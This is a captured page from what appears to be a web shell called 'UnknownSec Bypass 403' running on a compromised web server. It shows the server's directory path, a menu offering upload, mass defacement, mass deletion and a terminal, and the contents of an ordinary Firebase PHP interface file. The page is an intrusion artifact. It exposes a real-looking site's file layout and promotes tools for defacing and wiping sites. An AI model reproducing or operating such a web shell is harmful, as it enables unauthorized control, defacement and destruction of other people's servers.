UnknownSec Bypass
403
:
/
var
/
www
/
zenithentcare
/
vendor
/
kreait
/
firebase-tokens
/
src
/
Firebase
/
Auth
/
Token
/
Domain
/ [
drwxrwxr-x
]
Menu
Upload
Mass depes
Mass delete
Terminal
Info server
About
name :
Verifier.php
<?php declare(strict_types=1); namespace Firebase\Auth\Token\Domain; use Firebase\Auth\Token\Exception\ExpiredToken; use Firebase\Auth\Token\Exception\InvalidSignature; use Firebase\Auth\Token\Exception\InvalidToken; use Firebase\Auth\Token\Exception\IssuedInTheFuture; use Firebase\Auth\Token\Exception\UnknownKey; use InvalidArgumentException; use Lcobucci\JWT\Token; interface Verifier { /** * @param Token|string $token * * @throws InvalidArgumentException if the token could not be parsed * @throws InvalidToken if the token could be parsed, but is invalid for any one of the following reasons * @throws InvalidSignature if the signature doesn't match * @throws ExpiredToken if the token is expired * @throws IssuedInTheFuture if the token is issued in the future * @throws UnknownKey if the token's kid header doesnt' contain a known key */ public function verifyIdToken($token): Token; }
Copyright © 2025 - UnknownSec